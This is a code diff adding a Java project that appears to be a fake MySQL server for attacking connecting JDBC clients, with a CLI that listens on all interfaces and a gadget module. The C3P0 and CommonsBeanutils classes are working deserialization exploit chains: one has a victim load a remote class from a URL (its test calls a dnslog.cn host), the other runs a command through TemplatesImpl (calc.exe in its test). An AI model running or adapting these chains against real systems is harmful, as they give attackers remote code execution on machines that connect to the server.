mysql-fake-server

.gitignore

@@ -0,0 +1,42 @@
+target/
+!.mvn/wrapper/maven-wrapper.jar
+!**/src/main/**/target/
+!**/src/test/**/target/
+
+### IntelliJ IDEA ###
+.idea/modules.xml
+.idea/jarRepositories.xml
+.idea/compiler.xml
+.idea/libraries/
+*.iws
+*.iml
+*.ipr
+
+### Eclipse ###
+.apt_generated
+.classpath
+.factorypath
+.project
+.settings
+.springBeans
+.sts4-cache
+
+### NetBeans ###
+/nbproject/private/
+/nbbuild/
+/dist/
+/nbdist/
+/.nb-gradle/
+build/
+!**/src/main/**/build/
+!**/src/test/**/build/
+
+### VS Code ###
+.vscode/
+
+### Mac OS ###
+.DS_Store
+
+*.jar
+*.class
+.idea/

fake-mysql-cli/pom.xml

@@ -0,0 +1,81 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+    <parent>
+        <groupId>me.n1ar4</groupId>
+        <artifactId>FakeServer</artifactId>
+        <version>0.0.1</version>
+    </parent>
+
+    <artifactId>fake-mysql-cli</artifactId>
+
+    <properties>
+        <maven.compiler.source>8</maven.compiler.source>
+        <maven.compiler.target>8</maven.compiler.target>
+        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
+    </properties>
+
+    <dependencies>
+        <dependency>
+            <groupId>com.beust</groupId>
+            <artifactId>jcommander</artifactId>
+            <version>1.82</version>
+        </dependency>
+        <dependency>
+            <groupId>me.n1ar4</groupId>
+            <artifactId>fake-mysql-proto</artifactId>
+            <version>0.0.1</version>
+            <scope>compile</scope>
+        </dependency>
+        <dependency>
+            <groupId>me.n1ar4</groupId>
+            <artifactId>fake-mysql-gui</artifactId>
+            <version>0.0.1</version>
+            <scope>compile</scope>
+        </dependency>
+    </dependencies>
+
+    <build>
+        <plugins>
+            <plugin>
+                <artifactId>maven-assembly-plugin</artifactId>
+                <configuration>
+                    <appendAssemblyId>false</appendAssemblyId>
+                    <descriptorRefs>
+                        <descriptorRef>jar-with-dependencies</descriptorRef>
+                    </descriptorRefs>
+                    <archive>
+                        <manifest>
+                            <mainClass>me.n1ar4.fake.cli.Cli</mainClass>
+                        </manifest>
+                    </archive>
+                    <outputDirectory>../</outputDirectory>
+                </configuration>
+                <executions>
+                    <execution>
+                        <id>make-assembly</id>
+                        <phase>package</phase>
+                        <goals>
+                            <goal>assembly</goal>
+                        </goals>
+                    </execution>
+                </executions>
+            </plugin>
+            <plugin>
+                <groupId>org.apache.maven.plugins</groupId>
+                <artifactId>maven-compiler-plugin</artifactId>
+                <version>3.10.1</version>
+                <configuration>
+                    <source>${maven.compiler.source}</source>
+                    <target>${maven.compiler.target}</target>
+                    <compilerArgs>
+                        <arg>-Xlint:none</arg>
+                    </compilerArgs>
+                </configuration>
+            </plugin>
+        </plugins>
+    </build>
+
+</project>

fake-mysql-cli/src/main/java/me/n1ar4/fake/cli/Cli.java

@@ -0,0 +1,30 @@
+package me.n1ar4.fake.cli;
+
+import com.beust.jcommander.JCommander;
+import com.beust.jcommander.Parameter;
+import me.n1ar4.fake.proto.MySQLServer;
+
+public class Cli {
+    @Parameter(names = {"-p", "--port"}, description = "port")
+    private int port;
+
+    public static void main(String[] args) {
+        Cli main = new Cli();
+        JCommander.newBuilder()
+                .addObject(main)
+                .build()
+                .parse(args);
+
+        main.run();
+    }
+
+    private void run() {
+        if(port == 0) {
+            port = 3308;
+        }
+        MySQLServer.setIp("0.0.0.0");
+        MySQLServer.setPort(port);
+        PrintUtil.print();
+        MySQLServer.StartServer();
+    }
+}

fake-mysql-cli/src/main/java/me/n1ar4/fake/cli/PrintUtil.java

@@ -0,0 +1,15 @@
+package me.n1ar4.fake.cli;
+
+import me.n1ar4.fake.gui.Constant;
+
+public class PrintUtil {
+    public static void print(){
+        System.out.println("\u001B[33;1m　　 へ　　　　　／|\n　　/＼7　　　 ∠＿/\n　 /　"+
+                "│　　 ／　／\n　│　Z ＿,＜　／　　 /`ヽ\n　│　　　　　ヽ　　 /　　"+
+                "〉\n　 Y　　　　　`　 /　　/\n　?●　?　●　　??〈　　/\n　()　 へ"+
+                "　　　　|　＼〈\n　　>? ?_　 ィ　 │ ／／\n　 / へ　　 /　?＜| ＼＼"+
+                "\n　 ヽ_?　　(_／　 │／／\n　　7　　　　　　　|／\n　　＞―r￣￣~∠--|");
+        System.out.println("\u001B[32;1m Fake MySQL Server Cli \u001B[0m");
+        System.out.println("\u001B[32;1m Version: "+ Constant.version+" \u001B[0m");
+    }
+}

fake-mysql-gadget/pom.xml

@@ -0,0 +1,20 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+    <parent>
+        <groupId>me.n1ar4</groupId>
+        <artifactId>FakeServer</artifactId>
+        <version>0.0.1</version>
+    </parent>
+
+    <artifactId>fake-mysql-gadget</artifactId>
+
+    <properties>
+        <maven.compiler.source>8</maven.compiler.source>
+        <maven.compiler.target>8</maven.compiler.target>
+        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
+    </properties>
+
+</project>

fake-mysql-gadget/src/main/java/me/n1ar4/fake/gadget/C3P0.java

@@ -0,0 +1,82 @@
+package me.n1ar4.fake.gadget;
+
+import com.mchange.v2.c3p0.PoolBackedDataSource;
+import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;
+
+import java.util.logging.Logger;
+
+import javax.naming.NamingException;
+import javax.naming.Reference;
+import javax.naming.Referenceable;
+import javax.sql.ConnectionPoolDataSource;
+import javax.sql.PooledConnection;
+import java.io.PrintWriter;
+import java.sql.SQLException;
+import java.sql.SQLFeatureNotSupportedException;
+
+@SuppressWarnings("all")
+public class C3P0 {
+    public Object getObject(String command) throws Exception {
+        int sep = command.lastIndexOf(':');
+        if (sep < 0) {
+            throw new IllegalArgumentException("Command format is: <base_url>:<classname>");
+        }
+
+        String url = command.substring(0, sep);
+        String className = command.substring(sep + 1);
+
+        PoolBackedDataSource b = Reflections.createWithoutConstructor(PoolBackedDataSource.class);
+        Reflections.getField(PoolBackedDataSourceBase.class, "connectionPoolDataSource").set(b, new PoolSource(className, url));
+        return b;
+    }
+
+
+    private static final class PoolSource implements ConnectionPoolDataSource, Referenceable {
+
+        private String className;
+        private String url;
+
+        public PoolSource(String className, String url) {
+            this.className = className;
+            this.url = url;
+        }
+
+        public Reference getReference() throws NamingException {
+            return new Reference("exploit", this.className, this.url);
+        }
+
+        public PrintWriter getLogWriter() throws SQLException {
+            return null;
+        }
+
+        public void setLogWriter(PrintWriter out) throws SQLException {
+        }
+
+        public void setLoginTimeout(int seconds) throws SQLException {
+        }
+
+        public int getLoginTimeout() throws SQLException {
+            return 0;
+        }
+
+        public Logger getParentLogger() throws SQLFeatureNotSupportedException {
+            return null;
+        }
+
+        public PooledConnection getPooledConnection() throws SQLException {
+            return null;
+        }
+
+        public PooledConnection getPooledConnection(String user, String password) throws SQLException {
+            return null;
+        }
+
+    }
+
+
+    public static void main(final String[] args) throws Exception {
+        C3P0 c = new C3P0();
+        Object o = c.getObject("http://05x0fw.dnslog.cn/:test");
+        SerUtil.deserializeObject(SerUtil.serializeObject(o));
+    }
+}

fake-mysql-gadget/src/main/java/me/n1ar4/fake/gadget/CB.java

@@ -0,0 +1,37 @@
+package me.n1ar4.fake.gadget;
+
+import org.apache.commons.beanutils.BeanComparator;
+
+import java.math.BigInteger;
+import java.util.PriorityQueue;
+
+@SuppressWarnings("all")
+public class CB {
+    public Object getObject(final String command) throws Exception {
+        final Object templates = Gadgets.createTemplatesImpl(command);
+        // mock method name until armed
+        final BeanComparator comparator = new BeanComparator("lowestSetBit");
+
+        // create queue with numbers and basic comparator
+        final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
+        // stub data for replacement later
+        queue.add(new BigInteger("1"));
+        queue.add(new BigInteger("1"));
+
+        // switch method called by comparator
+        Reflections.setFieldValue(comparator, "property", "outputProperties");
+
+        // switch contents of queue
+        final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
+        queueArray[0] = templates;
+        queueArray[1] = templates;
+
+        return queue;
+    }
+
+    public static void main(String[] args) throws Exception {
+        CB c = new CB();
+        Object obj = c.getObject("calc.exe");
+        SerUtil.deserializeObject(SerUtil.serializeObject(obj));
+    }
+}